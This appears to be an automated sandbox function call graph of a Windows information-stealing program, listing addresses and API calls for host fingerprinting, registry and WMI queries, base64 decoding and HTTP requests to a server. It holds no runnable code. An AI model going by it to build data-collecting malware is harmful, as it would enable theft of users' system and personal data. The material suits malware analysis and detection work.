61171->61172 61173 40f986 61172->61173 61174 40f97e lstrcpy 61172->61174 61173->60277 61174->61173 61175->60287 61177 410516 GetVolumeInformationA 61176->61177 61178 41050f 61176->61178 61179 410546 61177->61179 61178->61177 61180 410578 GetProcessHeap HeapAlloc 61179->61180 61181 41059b wsprintfA lstrcat 61180->61181 61182 41058d 61180->61182 62199 4104a2 GetCurrentHwProfileA 61181->62199 61183 40f923 lstrcpy 61182->61183 61185 410596 61183->61185 61185->60294 61186 4105cb 61187 4105da lstrlenA 61186->61187 61188 4105ee 61187->61188 62203 411154 lstrcpy malloc strncpy 61188->62203 61190 4105f8 61191 410606 lstrcat 61190->61191 61192 410619 61191->61192 61193 40f923 lstrcpy 61192->61193 61194 41062a 61193->61194 61194->61185 61196 40f95a lstrcpy 61195->61196 61197 403b25 61196->61197 62204 403a54 _EH_prolog 61197->62204 61199 403b31 61200 40f923 lstrcpy 61199->61200 61201 403b4e 61200->61201 61202 40f923 lstrcpy 61201->61202 61203 403b61 61202->61203 61204 40f923 lstrcpy 61203->61204 61205 403b72 61204->61205 61206 40f923 lstrcpy 61205->61206 61207 403b83 61206->61207 61208 40f923 lstrcpy 61207->61208 61209 403b94 61208->61209 61210 403ba4 InternetOpenA StrCmpCA 61209->61210 61211 403bc6 61210->61211 61212 404122 InternetCloseHandle 61211->61212 61213 410b5c 3 API calls 61211->61213 61226 404136 61212->61226 61214 403bdc 61213->61214 61215 40fa28 3 API calls 61214->61215 61216 403bef 61215->61216 61217 40f9e1 lstrcpy 61216->61217 61218 403bfc 61217->61218 61219 40fa9c 4 API calls 61218->61219 61220 403c25 61219->61220 61221 40f9e1 lstrcpy 61220->61221 61222 403c32 61221->61222 61223 40fa9c 4 API calls 61222->61223 61224 403c4f 61223->61224 61225 40f9e1 lstrcpy 61224->61225 61227 403c5c 61225->61227 61226->60297 61228 40fa28 3 API calls 61227->61228 61229 403c78 61228->61229 61230 40f9e1 lstrcpy 61229->61230 61231 403c85 61230->61231 61232 40fa9c 4 API calls 61231->61232 61233 403ca2 61232->61233 61234 40f9e1 lstrcpy 61233->61234 61235 403caf 61234->61235 61236 40fa9c 4 API calls 61235->61236 61237 403ccc 61236->61237 61238 40f9e1 lstrcpy 61237->61238 61239 403cd9 61238->61239 61240 40fa9c 4 API calls 61239->61240 61241 403cf7 61240->61241 61242 40fa28 3 API calls 61241->61242 61243 403d0a 61242->61243 61244 40f9e1 lstrcpy 61243->61244 61245 403d17 61244->61245 61246 403d2f InternetConnectA 61245->61246 61246->61212 61247 403d55 HttpOpenRequestA 61246->61247 61248 404119 InternetCloseHandle 61247->61248 61249 403d8e 61247->61249 61248->61212 61250 403d92 InternetSetOptionA 61249->61250 61251 403da8 61249->61251 61250->61251 61252 40fa9c 4 API calls 61251->61252 61253 403db9 61252->61253 61254 40f9e1 lstrcpy 61253->61254 61255 403dc6 61254->61255 61256 40fa28 3 API calls 61255->61256 61257 403de2 61256->61257 61258 40f9e1 lstrcpy 61257->61258 61259 403def 61258->61259 61260 40fa9c 4 API calls 61259->61260 61261 403e0c 61260->61261 61262 40f9e1 lstrcpy 61261->61262 61263 403e19 61262->61263 61264 40fa9c 4 API calls 61263->61264 61265 403e37 61264->61265 61266 40f9e1 lstrcpy 61265->61266 61267 403e44 61266->61267 61268 40fa9c 4 API calls 61267->61268 61269 403e61 61268->61269 61270 40f9e1 lstrcpy 61269->61270 61271 403e6e 61270->61271 61272 40fa9c 4 API calls 61271->61272 61273 403e8b 61272->61273 61274 40f9e1 lstrcpy 61273->61274 61275 403e98 61274->61275 61276 40fa28 3 API calls 61275->61276 61277 403eb4 61276->61277 61278 40f9e1 lstrcpy 61277->61278 61279 403ec1 61278->61279 61280 40fa9c 4 API calls 61279->61280 61281 403ede 61280->61281 61282 40f9e1 lstrcpy 61281->61282 61283 403eeb 61282->61283 61284 40fa9c 4 API calls 61283->61284 61285 403f08 61284->61285 61286 40f9e1 lstrcpy 61285->61286 61287 403f15 61286->61287 61288 40fa28 3 API calls 61287->61288 61289 403f31 61288->61289 61290 40f9e1 lstrcpy 61289->61290 61291 403f3e 61290->61291 61292 40fa9c 4 API calls 61291->61292 61293 403f5b 61292->61293 61294 40f9e1 lstrcpy 61293->61294 61295 403f68 61294->61295 61296 40fa9c 4 API calls 61295->61296 61297 403f86 61296->61297 61298 40f9e1 lstrcpy 61297->61298 61299 403f93 61298->61299 61300 40fa9c 4 API calls 61299->61300 61301 403fb0 61300->61301 61302 40f9e1 lstrcpy 61301->61302 61303 403fbd 61302->61303 61304 40fa9c 4 API calls 61303->61304 61305 403fda 61304->61305 61306 40f9e1 lstrcpy 61305->61306 61307 403fe7 61306->61307 61308 40fa28 3 API calls 61307->61308 61309 404003 61308->61309 61310 40f9e1 lstrcpy 61309->61310 61311 404010 61310->61311 61312 40f923 lstrcpy 61311->61312 61313 404029 61312->61313 61314 40fa28 3 API calls 61313->61314 61315 40403d 61314->61315 61316 40fa28 3 API calls 61315->61316 61317 404050 61316->61317 61318 40f9e1 lstrcpy 61317->61318 61319 40405d 61318->61319 61320 40407d lstrlenA 61319->61320 61321 40408d 61320->61321 61322 404096 lstrlenA 61321->61322 62212 40fb4d 61322->62212 61324 4040a6 HttpSendRequestA 61325 4040ef InternetReadFile 61324->61325 61326 404106 InternetCloseHandle 61325->61326 61329 4040b5 61325->61329 62213 40f98e 61326->62213 61328 40fa9c 4 API calls 61328->61329 61329->61325 61329->61326 61329->61328 61330 40f9e1 lstrcpy 61329->61330 61330->61329 62217 40fb4d 61331->62217 61333 411cfe StrCmpCA 61334 411d10 61333->61334 61335 411d09 ExitProcess 61333->61335 61336 411d20 strtok_s 61334->61336 61337 411d31 61336->61337 61338 411e6d 61336->61338 61339 411e52 strtok_s 61337->61339 61340 411d81 StrCmpCA 61337->61340 61341 411df1 StrCmpCA 61337->61341 61342 411d65 StrCmpCA 61337->61342 61343 411dc7 StrCmpCA 61337->61343 61344 411e06 StrCmpCA 61337->61344 61345 411d49 StrCmpCA 61337->61345 61346 411d9d StrCmpCA 61337->61346 61347 411ddc StrCmpCA 61337->61347 61348 411e1c StrCmpCA 61337->61348 61349 411e3e StrCmpCA 61337->61349 61350 40f997 2 API calls 61337->61350 61338->60299 61339->61337 61339->61338 61340->61337 61340->61339 61341->61337 61341->61339 61342->61337 61342->61339 61343->61337 61343->61339 61344->61339 61345->61337 61345->61339 61346->61337 61346->61339 61347->61337 61347->61339 61348->61339 61349->61339 61350->61337 61352 40f95a lstrcpy 61351->61352 61353 40517c 61352->61353 61354 403a54 6 API calls 61353->61354 61355 405188 61354->61355 61356 40f923 lstrcpy 61355->61356 61357 4051a5 61356->61357 61358 40f923 lstrcpy 61357->61358 61359 4051b8 61358->61359 61360 40f923 lstrcpy 61359->61360 61361 4051c9 61360->61361 61362 40f923 lstrcpy 61361->61362 61363 4051da 61362->61363 61364 40f923 lstrcpy 61363->61364 61365 4051eb 61364->61365 61366 4051fb InternetOpenA StrCmpCA 61365->61366 61367 40521d 61366->61367 61368 4058d8 InternetCloseHandle 61367->61368 61370 410b5c 3 API calls 61367->61370 61369 4058f3 61368->61369 62224 406242 CryptStringToBinaryA 61369->62224 61371 405233 61370->61371 61373 40fa28 3 API calls 61371->61373 61375 405246 61373->61375 61376 40f9e1 lstrcpy 61375->61376 61381 405253 61376->61381 61377 40f997 2 API calls 61378 40590c 61377->61378 61379 40fa9c 4 API calls 61378->61379 61380 40591a 61379->61380 61382 40f9e1 lstrcpy 61380->61382 61383 40fa9c 4 API calls 61381->61383 61388 405926 61382->61388 61384 40527c 61383->61384 61385 40f9e1 lstrcpy 61384->61385 61386 405289 61385->61386 61387 40fa9c 4 API calls 61386->61387 61389 4052a6 61387->61389 61390 401061 _EH_prolog 61388->61390 61392 40f9e1 lstrcpy 61389->61392 61391 405984 61390->61391 61391->60305 61393 4052b3 61392->61393 61394 40fa28 3 API calls 61393->61394 61395 4052cf 61394->61395 61396 40f9e1 lstrcpy 61395->61396 61397 4052dc 61396->61397 61398 40fa9c 4 API calls 61397->61398 61399 4052f9 61398->61399 61400 40f9e1 lstrcpy 61399->61400 61401 405306 61400->61401 61402 40fa9c 4 API calls 61401->61402 61403 405323 61402->61403 61404 40f9e1 lstrcpy 61403->61404 61405 405330 61404->61405 61406 40fa9c 4 API calls 61405->61406 61407 40534e 61406->61407 61408 40fa28 3 API calls 61407->61408 61409 405361 61408->61409 61410 40f9e1 lstrcpy 61409->61410 61411 40536e 61410->61411 61412 405386 InternetConnectA 61411->61412 61412->61368 61413 4053ac HttpOpenRequestA 61412->61413 61414 4053e3 61413->61414 61415 4058cf InternetCloseHandle 61413->61415 61416 4053e7 InternetSetOptionA 61414->61416 61417 4053fd 61414->61417 61415->61368 61416->61417 61418 40fa9c 4 API calls 61417->61418 61419 40540e 61418->61419 61420 40f9e1 lstrcpy 61419->61420 61421 40541b 61420->61421 61422 40fa28 3 API calls 61421->61422 61423 405437 61422->61423 61424 40f9e1 lstrcpy 61423->61424 61425 405444 61424->61425 61426 40fa9c 4 API calls 61425->61426 61427 405461 61426->61427 61428 40f9e1 lstrcpy 61427->61428 61429 40546e 61428->61429 61430 40fa9c 4 API calls 61429->61430 61431 40548c 61430->61431 61432 40f9e1 lstrcpy 61431->61432 61433 405499 61432->61433 61434 40fa9c 4 API calls 61433->61434 61435 4054b7 61434->61435 61436 40f9e1 lstrcpy 61435->61436 61437 4054c4 61436->61437 61438 40fa9c 4 API calls 61437->61438 61439 4054e1 61438->61439 61440 40f9e1 lstrcpy 61439->61440 61441 4054ee 61440->61441 61442 40fa28 3 API calls 61441->61442 61443 40550a 61442->61443 61444 40f9e1 lstrcpy 61443->61444 61445 405517 61444->61445 61446 40fa9c 4 API calls 61445->61446 61447 405534 61446->61447 61448 40f9e1 lstrcpy 61447->61448 61449 405541 61448->61449 61450 40fa9c 4 API calls 61449->61450 61451 40555e 61450->61451 61452 40f9e1 lstrcpy 61451->61452 61453 40556b 61452->61453 61454 40fa28 3 API calls 61453->61454 61455 405587 61454->61455 61456 40f9e1 lstrcpy 61455->61456 61457 405594 61456->61457 61458 40fa9c 4 API calls 61457->61458 61459 4055b1 61458->61459 61460 40f9e1 lstrcpy 61459->61460 61461 4055be 61460->61461 61462 40fa9c 4 API calls 61461->61462 61463 4055dc 61462->61463 61464 40f9e1 lstrcpy 61463->61464 61465 4055e9 61464->61465 61466 40fa9c 4 API calls 61465->61466 61467 405606 61466->61467 61468 40f9e1 lstrcpy 61467->61468 61469 405613 61468->61469 61470 40fa9c 4 API calls 61469->61470 61471 405630 61470->61471 61472 40f9e1 lstrcpy 61471->61472 61473 40563d 61472->61473 61474 40fa9c 4 API calls 61473->61474 61475 40565b 61474->61475 61476 40f9e1 lstrcpy 61475->61476 61477 405668 61476->61477 61478 40fa9c 4 API calls 61477->61478 61479 405685 61478->61479 61480 40f9e1 lstrcpy 61479->61480 61481 405692 61480->61481 61482 40fa9c 4 API calls 61481->61482 61483 4056af 61482->61483 61484 40f9e1 lstrcpy 61483->61484 61485 4056bc 61484->61485 61486 40fa28 3 API calls 61485->61486 61487 4056d8 61486->61487 61488 40f9e1 lstrcpy 61487->61488 61489 4056e5 61488->61489 61490 40fa9c 4 API calls 61489->61490 61491 405702 61490->61491 61492 40f9e1 lstrcpy 61491->61492 61493 40570f 61492->61493 61494 40fa9c 4 API calls 61493->61494 61495 40572d 61494->61495 61496 40f9e1 lstrcpy 61495->61496 61497 40573a 61496->61497 61498 40fa9c 4 API calls 61497->61498 61499 405757 61498->61499 61500 40f9e1 lstrcpy 61499->61500 61501 405764 61500->61501 61502 40fa9c 4 API calls 61501->61502 61503 405781 61502->61503 61504 40f9e1 lstrcpy 61503->61504 61505 40578e 61504->61505 61506 40fa28 3 API calls 61505->61506 61507 4057aa 61506->61507 61508 40f9e1 lstrcpy 61507->61508 61509 4057b7 61508->61509 61510 4057cb lstrlenA 61509->61510 62218 40fb4d 61510->62218 61512 4057dc lstrlenA GetProcessHeap HeapAlloc 62219 40fb4d 61512->62219 61514 4057fe lstrlenA 62220 40fb4d 61514->62220 61516 40580e memcpy 62221 40fb4d 61516->62221 61518 405820 lstrlenA 61519 405830 61518->61519 61520 405839 lstrlenA memcpy 61519->61520 62222 40fb4d 61520->62222 61522 405855 lstrlenA 62223 40fb4d 61522->62223 61524 405865 HttpSendRequestA 61525 4058b1 InternetReadFile 61524->61525 61526 4058c8 InternetCloseHandle 61525->61526 61528 405877 61525->61528 61526->61415 61527 40fa9c 4 API calls 61527->61528 61528->61525 61528->61526 61528->61527 61529 40f9e1 lstrcpy 61528->61529 61529->61528 62229 40fb4d 61530->62229 61532 411740 strtok_s 61533 4117a9 61532->61533 61535 41174d 61532->61535 61533->60307 61534 40f997 2 API calls 61536 411792 strtok_s 61534->61536 61535->61534 61535->61536 61537 40f997 2 API calls 61535->61537 61536->61533 61536->61535 61537->61535 62230 40fb4d 61538->62230 61540 41151d strtok_s 61541 41162e 61540->61541 61546 41152e 61540->61546 61541->60315 61542 4115df StrCmpCA 61542->61546 61543 40f997 2 API calls 61544 411611 strtok_s 61543->61544 61544->61541 61544->61546 61545 4115ae StrCmpCA 61545->61546 61546->61542 61546->61543 61546->61544 61546->61545 61547 411589 StrCmpCA 61546->61547 61548 41155b StrCmpCA 61546->61548 61547->61546 61548->61546 62231 40fb4d 61549->62231 61551 411674 strtok_s 61552 411681 61551->61552 61557 4116fa 61551->61557 61553 4116ab StrCmpCA 61552->61553 61554 40f997 2 API calls 61552->61554 61555 4116e3 strtok_s 61552->61555 61556 40f997 2 API calls 61552->61556 61553->61552 61554->61555 61555->61552 61555->61557 61556->61552 61557->60323 61559 40f923 lstrcpy 61558->61559 61560 414625 61559->61560 61561 40fa9c 4 API calls 61560->61561 61562 41463a 61561->61562 61563 40f9e1 lstrcpy 61562->61563 61564 414647 61563->61564 61565 40fa9c 4 API calls 61564->61565 61566 414665 61565->61566 61567 40f9e1 lstrcpy 61566->61567 61568 414672 61567->61568 61569 40fa9c 4 API calls 61568->61569 61570 41468f 61569->61570 61571 40f9e1 lstrcpy 61570->61571 61572 41469c 61571->61572 61573 40fa9c 4 API calls 61572->61573 61574 4146b9 61573->61574 61575 40f9e1 lstrcpy 61574->61575 61576 4146c6 61575->61576 61577 40fa9c 4 API calls 61576->61577 61578 4146e3 61577->61578 61579 40f9e1 lstrcpy 61578->61579 61580 4146f0 61579->61580 62232 40fc38 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 61580->62232 61582 414701 61583 40fa9c 4 API calls 61582->61583 61584 41470e 61583->61584 61585 40f9e1 lstrcpy 61584->61585 61586 41471b 61585->61586 61587 40fa9c 4 API calls 61586->61587 61588 414738 61587->61588 61589 40f9e1 lstrcpy 61588->61589 61590 414745 61589->61590 61591 40fa9c 4 API calls 61590->61591 61592 414762 61591->61592 61593 40f9e1 lstrcpy 61592->61593 61594 41476f 61593->61594 62233 410415 memset RegOpenKeyExA 61594->62233 61596 414780 61597 40fa9c 4 API calls 61596->61597 61598 41478d 61597->61598 61599 40f9e1 lstrcpy 61598->61599 61600 41479a 61599->61600 61601 40fa9c 4 API calls 61600->61601 61602 4147b7 61601->61602 61603 40f9e1 lstrcpy 61602->61603 61604 4147c4 61603->61604 61605 40fa9c 4 API calls 61604->61605 61606 4147e1 61605->61606 61607 40f9e1 lstrcpy 61606->61607 61608 4147ee 61607->61608 61609 4104a2 2 API calls 61608->61609 61610 414803 61609->61610 61611 40fa28 3 API calls 61610->61611 61612 414815 61611->61612 61613 40f9e1 lstrcpy 61612->61613 61614 414822 61613->61614 61615 40fa9c 4 API calls 61614->61615 61616 41484b 61615->61616 61617 40f9e1 lstrcpy 61616->61617 61618 414858 61617->61618 61619 40fa9c 4 API calls 61618->61619 61620 414875 61619->61620 61621 40f9e1 lstrcpy 61620->61621 61622 414882 61621->61622 61623 4104dd 13 API calls 61622->61623 61624 414897 61623->61624 61625 40fa28 3 API calls 61624->61625 61626 4148a9 61625->61626 61627 40f9e1 lstrcpy 61626->61627 61628 4148b6 61627->61628 61629 40fa9c 4 API calls 61628->61629 61630 4148df 61629->61630 61631 40f9e1 lstrcpy 61630->61631 61632 4148ec 61631->61632 61633 40fa9c 4 API calls 61632->61633 61634 414909 61633->61634 61635 40f9e1 lstrcpy 61634->61635 61636 414916 61635->61636 61637 414922 GetCurrentProcessId 61636->61637 62237 411001 OpenProcess 61637->62237 61640 40fa28 3 API calls 61641 414945 61640->61641 61642 40f9e1 lstrcpy 61641->61642 61643 414952 61642->61643 61644 40fa9c 4 API calls 61643->61644 61645 41497b 61644->61645 61646 40f9e1 lstrcpy 61645->61646 61647 414988 61646->61647 61648 40fa9c 4 API calls 61647->61648 61649 4149a5 61648->61649 61650 40f9e1 lstrcpy 61649->61650 61651 4149b2 61650->61651 61652 40fa9c 4 API calls 61651->61652 61653 4149cf 61652->61653 61654 40f9e1 lstrcpy 61653->61654 61655 4149dc 61654->61655 61656 40fa9c 4 API calls 61655->61656 61657 4149f9 61656->61657 61658 40f9e1 lstrcpy 61657->61658 61659 414a06 61658->61659 62242 41064b GetProcessHeap HeapAlloc 61659->62242 61662 40fa9c 4 API calls 61663 414a24 61662->61663 61664 40f9e1 lstrcpy 61663->61664 61665 414a31 61664->61665 61666 40fa9c 4 API calls 61665->61666 61667 414a4e 61666->61667 61668 40f9e1 lstrcpy 61667->61668 61669 414a5b 61668->61669 61670 40fa9c 4 API calls 61669->61670 61671 414a78 61670->61671 61672 40f9e1 lstrcpy 61671->61672 61673 414a85 61672->61673 62248 41077c _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 61673->62248 61676 40fa28 3 API calls 61677 414aac 61676->61677 61678 40f9e1 lstrcpy 61677->61678 61679 414ab9 61678->61679 61680 40fa9c 4 API calls 61679->61680 61681 414ae2 61680->61681 61682 40f9e1 lstrcpy 61681->61682 61683 414aef 61682->61683 61684 40fa9c 4 API calls 61683->61684 61685 414b0c 61684->61685 61686 40f9e1 lstrcpy 61685->61686 61687 414b19 61686->61687 62261 410925 _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 61687->62261 61690 40fa28 3 API calls 61691 414b40 61690->61691 61692 40f9e1 lstrcpy 61691->61692 61693 414b4d 61692->61693 61694 40fa9c 4 API calls 61693->61694 61695 414b76 61694->61695 61696 40f9e1 lstrcpy 61695->61696 61697 414b83 61696->61697 61698 40fa9c 4 API calls 61697->61698 61699 414ba0 61698->61699 61700 40f9e1 lstrcpy 61699->61700 61701 414bad 61700->61701 62274 40fbfd GetProcessHeap HeapAlloc GetComputerNameA 61701->62274 61704 40fa9c 4 API calls 61705 414bcb 61704->61705 61706 40f9e1 lstrcpy 61705->61706 61707 414bd8 61706->61707 61708 40fa9c 4 API calls 61707->61708 61709 414bf5 61708->61709 61710 40f9e1 lstrcpy 61709->61710 61711 414c02 61710->61711 61712 40fa9c 4 API calls 61711->61712 61713 414c1f 61712->61713 61714 40f9e1 lstrcpy 61713->61714 61715 414c2c 61714->61715 62276 40fbcb GetProcessHeap HeapAlloc GetUserNameA 61715->62276 61717 414c3d 61718 40fa9c 4 API calls 61717->61718 61719 414c4a 61718->61719 61720 40f9e1 lstrcpy 61719->61720 61721 414c57 61720->61721 61722 40fa9c 4 API calls 61721->61722 61723 414c74 61722->61723 61724 40f9e1 lstrcpy 61723->61724 61725 414c81 61724->61725 61726 40fa9c 4 API calls 61725->61726 61727 414c9e 61726->61727 61728 40f9e1 lstrcpy 61727->61728 61729 414cab 61728->61729 62277 4103a0 7 API calls 61729->62277 61732 40fa28 3 API calls 61733 414cd2 61732->61733 61734 40f9e1 lstrcpy 61733->61734 61735 414cdf 61734->61735 61736 40fa9c 4 API calls 61735->61736 61737 414d08 61736->61737 61738 40f9e1 lstrcpy 61737->61738 61739 414d15 61738->61739 61740 40fa9c 4 API calls 61739->61740 61741 414d32 61740->61741 61742 40f9e1 lstrcpy 61741->61742 61743 414d3f 61742->61743 62280 40fce5 _EH_prolog 61743->62280 61746 40fa28 3 API calls 61747 414d69 61746->61747 61748 40f9e1 lstrcpy 61747->61748 61749 414d76 61748->61749 61750 40fa9c 4 API calls 61749->61750 61751 414da5 61750->61751 61752 40f9e1 lstrcpy 61751->61752 61753 414db2 61752->61753 61754 40fa9c 4 API calls 61753->61754 61755 414dd5 61754->61755 61756 40f9e1 lstrcpy 61755->61756 61757 414de2 61756->61757 62290 40fc38 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 61757->62290 61759 414df6 61760 40fa9c 4 API calls 61759->61760 61761 414e06 61760->61761 61762 40f9e1 lstrcpy 61761->61762 61763 414e13 61762->61763 61764 40fa9c 4 API calls 61763->61764 61765 414e36 61764->61765 61766 40f9e1 lstrcpy 61765->61766 61767 414e43 61766->61767 61768 40fa9c 4 API calls 61767->61768 61769 414e63 61768->61769 61770 40f9e1 lstrcpy 61769->61770 61771 414e70 61770->61771 62291 40fc92 GetProcessHeap HeapAlloc GetTimeZoneInformation 61771->62291 61774 40fa9c 4 API calls 61775 414e8e 61774->61775 61776 40f9e1 lstrcpy 61775->61776 61777 414e9b 61776->61777 61778 40fa9c 4 API calls 61777->61778 61779 414ebb 61778->61779 61780 40f9e1 lstrcpy 61779->61780 61781 414ec8 61780->61781 61782 40fa9c 4 API calls 61781->61782 61783 414eeb 61782->61783 61784 40f9e1 lstrcpy 61783->61784 61785 414ef8 61784->61785 61786 40fa9c 4 API calls 61785->61786 61787 414f1b 61786->61787 61788 40f9e1 lstrcpy 61787->61788 61789 414f28 61788->61789 62294 40fe18 GetProcessHeap HeapAlloc RegOpenKeyExA 61789->62294 61792 40fa9c 4 API calls 61793 414f4c 61792->61793 61794 40f9e1 lstrcpy 61793->61794 61795 414f59 61794->61795 61796 40fa9c 4 API calls 61795->61796 61797 414f7c 61796->61797 61798 40f9e1 lstrcpy 61797->61798 61799 414f89 61798->61799 61800 40fa9c 4 API calls 61799->61800 61801 414fa9 61800->61801 61802 40f9e1 lstrcpy 61801->61802 61803 414fb6 61802->61803 62297 40feb4 61803->62297 61806 40fa9c 4 API calls 61807 414fd4 61806->61807 61808 40f9e1 lstrcpy 61807->61808 61809 414fe1 61808->61809 61810 40fa9c 4 API calls 61809->61810 61811 415001 61810->61811 61812 40f9e1 lstrcpy 61811->61812 61813 41500e 61812->61813 61814 40fa9c 4 API calls 61813->61814 61815 41502e 61814->61815 61816 40f9e1 lstrcpy 61815->61816 61817 41503b 61816->61817 62312 40fe81 GetSystemInfo wsprintfA 61817->62312 61819 41504c 61820 40fa9c 4 API calls 61819->61820 61821 415059 61820->61821 61822 40f9e1 lstrcpy 61821->61822 61823 415066 61822->61823 61824 40fa9c 4 API calls 61823->61824 61825 415086 61824->61825 61826 40f9e1 lstrcpy 61825->61826 61827 415093 61826->61827 61828 40fa9c 4 API calls 61827->61828 61829 4150b3 61828->61829 61830 40f9e1 lstrcpy 61829->61830 61831 4150c0 61830->61831 62313 40ff81 GetProcessHeap HeapAlloc 61831->62313 61833 4150d1 61834 40fa9c 4 API calls 61833->61834 61835 4150de 61834->61835 61836 40f9e1 lstrcpy 61835->61836 61837 4150eb 61836->61837 61838 40fa9c 4 API calls 61837->61838 61839 41510b 61838->61839 61840 40f9e1 lstrcpy 61839->61840 61841 415118 61840->61841 61842 40fa9c 4 API calls 61841->61842 61843 41513b 61842->61843 61844 40f9e1 lstrcpy 61843->61844 61845 415148 61844->61845 62318 40ffea _EH_prolog 61845->62318 61848 40fa28 3 API calls 61849 415178 61848->61849 61850 40f9e1 lstrcpy 61849->61850 61851 415185 61850->61851 61852 40fa9c 4 API calls 61851->61852 61853 4151b7 61852->61853 61854 40f9e1 lstrcpy 61853->61854 61855 4151c4 61854->61855 61856 40fa9c 4 API calls 61855->61856 61857 4151e7 61856->61857 61858 40f9e1 lstrcpy 61857->61858 61859 4151f4 61858->61859 62324 4102c3 _EH_prolog 61859->62324 61861 41520f 61862 40fa28 3 API calls 61861->61862 61863 415224 61862->61863 61864 40f9e1 lstrcpy 61863->61864 61865 415231 61864->61865 61866 40fa9c 4 API calls 61865->61866 61867 415263 61866->61867 61868 40f9e1 lstrcpy 61867->61868 61869 415270 61868->61869 61870 40fa9c 4 API calls 61869->61870 61871 415293 61870->61871 61872 40f9e1 lstrcpy 61871->61872 61873 4152a0 61872->61873 62332 410071 _EH_prolog 61873->62332 61875 4152bd 61876 40fa28 3 API calls 61875->61876 61877 4152d3 61876->61877 61878 40f9e1 lstrcpy 61877->61878 61879 4152e0 61878->61879 61880 410071 15 API calls 61879->61880 61881 41530c 61880->61881 61882 40fa28 3 API calls 61881->61882 61883 41531f 61882->61883 61884 40f9e1 lstrcpy 61883->61884 61885 41532c 61884->61885 61886 40fa9c 4 API calls 61885->61886 61887 415358 61886->61887 61888 40f9e1 lstrcpy 61887->61888 61889 415365 61888->61889 61890 415379 lstrlenA 61889->61890 61891 415389 61890->61891 61892 40f923 lstrcpy 61891->61892 61893 41539f 61892->61893 61894 4010b1 2 API calls 61893->61894 61895 4153b7 61894->61895 62348 414437 _EH_prolog 61895->62348 61897 4153c4 61898 401061 _EH_prolog 61897->61898 61899 4153ea 61898->61899 61899->60328 61901 40f95a lstrcpy 61900->61901 61902 4041dd 61901->61902 61903 403a54 6 API calls 61902->61903 61904 4041e9 GetProcessHeap RtlAllocateHeap 61903->61904 62618 40fb4d 61904->62618 61906 404223 InternetOpenA StrCmpCA 61907 404242 61906->61907 61908 404378 InternetCloseHandle 61907->61908 61909 40424d InternetConnectA 61907->61909 61916 4042e9 61908->61916 61910 40426d HttpOpenRequestA 61909->61910 61911 40436f InternetCloseHandle 61909->61911 61912 4042a2 61910->61912 61913 404368 InternetCloseHandle 61910->61913 61911->61908 61914 4042a6 InternetSetOptionA 61912->61914 61915 4042bc HttpSendRequestA HttpQueryInfoA 61912->61915 61913->61911 61914->61915 61915->61916 61918 40430c 61915->61918 61916->60333 61917 404326 InternetReadFile 61917->61913 61917->61918 61918->61913 61918->61916 61918->61917 62619 4060db 61919->62619 61921 40ef5b 61925 40ed50 StrCmpCA 61954 40ed28 61925->61954 61928 40edc4 StrCmpCA 61928->61954 61931 40f923 lstrcpy 61931->61954 61932 40eee0 StrCmpCA 61932->61954 61935 40fa9c _EH_prolog lstrlenA lstrcpy lstrcat 61935->61954 61938 40fa28 3 API calls 61938->61954 61941 40f9e1 lstrcpy 61941->61954 61949 4010b1 _EH_prolog lstrcpy 61949->61954 61953 40f95a lstrcpy 61953->61954 61954->61921 61954->61925 61954->61928 61954->61931 61954->61932 61954->61935 61954->61938 61954->61941 61954->61949 61954->61953 62622 40d3fa _EH_prolog 61954->62622 62676 40d6bb _EH_prolog 61954->62676 62788 40b8af _EH_prolog 61954->62788 62177 40f923 lstrcpy 62176->62177 62178 402128 62177->62178 62178->61161 62180 401081 62179->62180 62180->61154 62181->61161 62182->61161 62183->61161 62184->61161 62185->61147 62186->61113 62187->61146 62188->61131 62189->61113 62190->61112 62191->61113 62192->61098 62193->61113 62195 40f923 lstrcpy 62194->62195 62196 402142 62195->62196 62196->61089 62197->61099 62198->61146 62200 4104c0 62199->62200 62201 40f923 lstrcpy 62200->62201 62202 4104d0 62201->62202 62202->61186 62203->61190 62205 403a6d 62204->62205 62205->62205 62206 403a74 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 62205->62206 62215 40fb4d 62206->62215 62208 403ab6 lstrlenA 62216 40fb4d 62208->62216 62210 403ac6 InternetCrackUrlA 62211 403ae4 62210->62211 62211->61199 62212->61324 62214 40f995 62213->62214 62214->61248 62215->62208 62216->62210 62217->61333 62218->61512 62219->61514 62220->61516 62221->61518 62222->61522 62223->61524 62225 40626c LocalAlloc 62224->62225 62226 4058f9 62224->62226 62225->62226 62227 40627c CryptStringToBinaryA 62225->62227 62226->61377 62226->61388 62227->62226 62228 406293 LocalFree 62227->62228 62228->62226 62229->61532 62230->61540 62231->61551 62232->61582 62234 410461 RegQueryValueExA 62233->62234 62235 41047c CharToOemA 62233->62235 62234->62235 62235->61596 62238 411041 62237->62238 62239 411025 K32GetModuleFileNameExA CloseHandle 62237->62239 62240 40f923 lstrcpy 62238->62240 62239->62238 62241 411050 62240->62241 62241->61640 62367 40fbbd 62242->62367 62245 41067e RegOpenKeyExA 62246 410677 62245->62246 62247 41069e RegQueryValueExA 62245->62247 62246->61662 62247->62246 62249 4107e5 62248->62249 62250 4108ea 62249->62250 62251 4107ed CoSetProxyBlanket 62249->62251 62252 40f923 lstrcpy 62250->62252 62253 41081d 62251->62253 62254 4108fb 62252->62254 62253->62250 62255 410851 VariantInit 62253->62255 62254->61676 62256 410874 62255->62256 62373 4106c4 _EH_prolog CoCreateInstance 62256->62373 62258 410882 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 62259 40f923 lstrcpy 62258->62259 62260 4108de VariantClear 62259->62260 62260->62254 62262 41098e 62261->62262 62263 410996 CoSetProxyBlanket 62262->62263 62264 410a33 62262->62264 62266 4109c6 62263->62266 62265 40f923 lstrcpy 62264->62265 62267 410a44 62265->62267 62266->62264 62268 4109f2 VariantInit 62266->62268 62267->61690 62269 410a15 62268->62269 62379 410c8d LocalAlloc CharToOemW 62269->62379 62271 410a1d 62272 40f923 lstrcpy 62271->62272 62273 410a27 VariantClear 62272->62273 62273->62267 62275 40fc33 62274->62275 62275->61704 62276->61717 62278 40f923 lstrcpy 62277->62278 62279 41040d 62278->62279 62279->61732 62281 40f923 lstrcpy 62280->62281 62282 40fd0d GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 62281->62282 62283 40fdf8 62282->62283 62289 40fd48 62282->62289 62285 40fe00 LocalFree 62283->62285 62286 40fe09 62283->62286 62284 40fd4d GetLocaleInfoA 62284->62289 